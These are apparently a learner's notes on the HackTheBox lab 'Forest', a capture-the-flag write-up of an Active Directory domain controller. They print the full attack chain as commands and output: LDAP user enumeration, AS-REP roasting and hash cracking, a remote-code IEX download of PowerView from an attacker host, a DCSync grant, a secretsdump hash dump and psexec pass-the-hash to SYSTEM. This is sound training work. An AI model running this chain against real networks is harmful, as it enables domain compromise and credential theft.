HackTheBox · Lab
Forest
NOTES
Starting off with basic and full nmap
basic
```shell
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
9389/tcp open adws
47001/tcp open winrm
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49667/tcp open unknown
49671/tcp open unknown
49676/tcp open unknown
49677/tcp open unknown
49684/tcp open unknown
49706/tcp open unknown
```
full
```shell
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-07-26 12:29:09Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2025-07-26T12:29:12
|_ start_date: 2025-07-26T12:24:08
|_clock-skew: mean: 2h26m47s, deviation: 4h02m30s, median: 6m47s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: FOREST
| NetBIOS computer name: FOREST\x00
| Domain name: htb.local
| Forest name: htb.local
| FQDN: FOREST.htb.local
|_ System time: 2025-07-26T05:29:10-07:00
```
SMB anonymous success
no shares
LDAP anonymous success
ldapsearch
```shell
ldapsearch -x -H ldap://10.10.10.161 -b "DC=htb,DC=local" '(objectClass=person)' sAMAccountName sAMAccountType | grep sAMAccountName
# requesting: sAMAccountName sAMAccountType
sAMAccountName: Guest
sAMAccountName: DefaultAccount
sAMAccountName: FOREST$
sAMAccountName: EXCH01$
sAMAccountName: $331000-VK4ADACQNUCA
sAMAccountName: SM_2c8eef0a09b545acb
sAMAccountName: SM_ca8c2ed5bdab4dc9b
sAMAccountName: SM_75a538d3025e4db9a
sAMAccountName: SM_681f53d4942840e18
sAMAccountName: SM_1b41c9286325456bb
sAMAccountName: SM_9b69f1b9d2cc45549
sAMAccountName: SM_7c96b981967141ebb
sAMAccountName: SM_c75ee099d0a64c91b
sAMAccountName: SM_1ffab36a2f5f479cb
sAMAccountName: HealthMailboxc3d7722
sAMAccountName: HealthMailboxfc9daad
sAMAccountName: HealthMailboxc0a90c9
sAMAccountName: HealthMailbox670628e
sAMAccountName: HealthMailbox968e74d
sAMAccountName: HealthMailbox6ded678
sAMAccountName: HealthMailbox83d6781
sAMAccountName: HealthMailboxfd87238
sAMAccountName: HealthMailboxb01ac64
sAMAccountName: HealthMailbox7108a4e
sAMAccountName: HealthMailbox0659cc1
sAMAccountName: sebastien
sAMAccountName: lucinda
sAMAccountName: andy
sAMAccountName: mark
sAMAccountName: santi
```
enum users
```shell
Administrator
Guest
DefaultAccount
krbtgt
$331000-VK4ADACQNUCA
sebastien
lucinda
svc-alfresco
andy
mark
santi
```
LDAP ASREP success
```shell
$krb5asrep$23$svc-alfresco@HTB.LOCAL:6e67b6e2194aa1e0c3a7702ca046da2c$a369a73f9203ae9bd76bc514a9c7de3429a9011c2250c166f6eb2ba1be74ad49cb69790ede7a8868d043deeb7c2db155a2a820fcb3e2e12919eb6f91ccc7b2f97dafdf35004dfb73b5b8a0aaaba8863eb2127009b5f75ccca6265eb787fb83f60d92cfa54dd308834abaa6a47463f6903f8f4ce963d0529d0c3537a65bdbe7f2449c9198bef259717599718c17a50f9f14c7bc0d6fd7fd83114c8afde46e3298f489a510c3eb072945d070879e0f9222febe06e308f2ccfb12968f01b87943d723e1294bb5a1c2475c3641f67e839c5fa3234d973bd515aa91d07290f35b231ae24147cda7d0
```
```shell
# hash cracked
svc-alfresco:s3rvice
```
SMB with svc-alfresco Successs
nothing to check
WinRM with svc-alfresco Success
[+] htb.local\svc-alfresco:s3rvice (Pwn3d!)
Flag found
We used nxc with bloodhound and uploaded all. We’ve checked for specials member privileges and found this.
SVC-ALFRESCO is a member of Account Operators
Lets go ahead and add us a member
C:\> net user 0xnrg Password123 /add /domain
The command completed successfully.
Let’s check Account Operators member of
Account Operators has generic all to Exchange Windows Permissions, which has WriteDACL to HTB.LOCAL
Let us add our self to Exchange Windows Permissions
net group "Exchange Windows Permissions" /add 0xnrg
The command completed successfully.
net group "Exchange Windows Permissions"
Members
-------------------------------------------------------------------------------
0xnrg
The command completed successfully.
Transfered PowwerView.ps1 to target with pyserv
IEX(New-Object Net.WebClient).downloadString('http://10.10.14.13/PowerView.ps1')
We can use the Add-ObjectACL with 0xnrg creds and give DCSync rights
$SecPassword = ConvertTo-SecureString 'Password123' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('HTB\0xnrg', $SecPassword)
Add-ObjectACL -PrincipalIdentity 0xnrg -Credential $cred -Rights DCSync
And now, we run our dcsync attack with secretsdump.
❯ impacket-secretsdump htb/0xnrg@10.10.10.161
Impacket v0.13.0.dev0+20250721.105211.7561038 - Copyright Fortra, LLC and its affiliated companies
Password:
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
htb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:819af826bb148e603acb0f33d17632f8:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Kerberos keys grabbed
htb.local\Administrator:aes256-cts-hmac-sha1-96:910e4c922b7516d4a27f05b5ae6a147578564284fff8461a02298ac9263bc913
...SNIP...
The obtained Domain Admin hash can be used to access the target as the administrator user using psexec
impacket-psexec administrator@10.10.10.161 -hashes 'aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6'
❯ impacket-psexec administrator@10.10.10.161 -hashes 'aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6'
Impacket v0.13.0.dev0+20250721.105211.7561038 - Copyright Fortra, LLC and its affiliated companies
[*] Requesting shares on 10.10.10.161.....
[*] Found writable share ADMIN$
[*] Uploading file LlJqRomt.exe
[*] Opening SVCManager on 10.10.10.161.....
[*] Creating service AOYM on 10.10.10.161.....
[*] Starting service AOYM.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
nt authority\system
WEB SERVICE TECHNOLOGY
WEB
NIKTO
WFUZZ / GOBUSTER
FILES
DIRS
SUBDIRS
VHOSTS
Ippsec Notes
Anonymous auth is possible if the server been upgraded from 2003
SCOPE
| IP | DNS |
|---|---|
| 10.10.10.161 | htb.local |
HOSTS
| HOSTNAME | OS |
|---|---|
| FOREST | Windows 10 / Server 2016 Build 14393 x64 |
USERS
Administrator
Guest
DefaultAccount
krbtgt
sebastien
lucinda
svc-alfresco
andy
mark
santi
CREDENTIALS
svc-alfresco:s3rvice
# Added account
0xnrg:Password123
NMAP
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
9389/tcp open adws
47001/tcp open winrm
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49667/tcp open unknown
49671/tcp open unknown
49676/tcp open unknown
49677/tcp open unknown
49684/tcp open unknown
49706/tcp open unknown
SMB SHARES
OTHER NOTES
DCSync attack from SVC-Alfresco > Account Operators > HTB.local
PowerView.ps1 dev had to be used here.